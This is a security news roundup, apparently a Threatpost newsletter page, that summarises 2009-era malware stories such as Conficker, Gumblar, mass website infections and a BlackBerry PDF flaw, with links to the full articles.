Examining Conficker: When a worm becomes a botnet

From TechTarget (Brian Sears)

I recently read an article where two experts expressed different ideas of what Conficker represented. One expert argued that Conficker was clearly not a botnet, as it lacked some of the basic abilities typically found in botnets. While the other expert said Conficker indeed was a botnet, In the end they both agreed Conficker represented a significant threat. So what is Conficker? Well in the case of our two experts, they were both right and wrong. In my opinion, Conficker appears as a package or a mesh of several different threats, each one with its own purpose. Read the full story []

The Twitter worm that isn’t

By Roel Schouwenberg

On Saturday an alert went out about a new Twitter worm.

Could this have been another XSS-Worm? Upon clicking the link users would see the following:


However that’s not all that happens. Covertly a connection is made to another server that will result in a malicious PDF being downloaded. This PDF contains a flurry of exploits.

30,000 legit websites hit by malware infection

From The Register (Dan Goodin)

A nasty infection that attempts to install a potent malware cocktail on the machines of end users has spread to about 30,000 websites run by businesses, government agencies and other organizations, researchers warned Friday [].

The infection sneaks malicious javascript onto the front page of websites, most likely by exploiting a common application that leads to a SQL injection, said Stephan Chenette, manager for security research at security firm Websense. The injected code is designed to look like a Google Analytics script, and it uses obfuscated javascript, so it is hard to spot. Read the full story []

From CNet (Elinor Mills)

The Web site compromise attack known as Gumblar has added new domain names that are downloading malware onto unsuspecting computers, stealing FTP credentials to compromise more sites, and tampering with Web traffic, a security firm said on Thursday.

The Gumblar attack started in March with Web sites being compromised and attack code hidden on them. Originally, the malware downloaded onto computers accessing those sites came from the domain, a Chinese domain associated with Russian and Latvian IP addresses that were delivering code from servers in the U.K. Read the full story []

There is a series of vulnerabilities in the widely used BlackBerry Enterprise Server software that could allow an attacker to compromise BlackBerry devices by sending a malicious PDF file. Research in Motion, the software’s maker, has issued a patch that fixes the problem in BES, as well as in BlackBerry Professional Software.

The latest large-scale malware outbreak to hit the Web, known variously as Gumblar and Geno and Martuz, is a multi-stage attack that not only infects compromised machines with a number of separate pieces of malware but also has the ability to steal credentials and block the victim from taking actions to clean his PC.

From the Associated Press
Law enforcement computers were struck by a Mystery computer virus Thursday, forcing the FBI and the U.S. Marshals to shut down part of their networks as a precaution.
The U.S. Marshals confirmed it disconnected from the Justice Department’s computers as a protective measure after being hit by the virus; an FBI official said only that that agency was experiencing similar issues and was working on the problem. Read the full story []

From CNet News (Liam Tung)

Cybercrime fighter Eugene Kaspersky can’t help but be impressed by the slick operations behind the Conficker botnet, and says that it could have been worse had the botnet been after more than just money. “They are high-end engineers who write code in a good way,” Kaspersky said. “They use cryptographic systems in the right way, they don’t make mistakes — they are really professional.”

From IDG News Service (Robert McMillan)
A new attack that peppers Google search results with malicious links is spreading quickly, the U.S. Computer Emergence Response Team warned [] on Monday.

The attack, which has intensified in recent days, can be found on several thousand legitimate Web sites, according to security experts. It targets known flaws in Adobe’s software and uses them to install a malicious program on victims’ machines, CERT said. Read the full story []

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.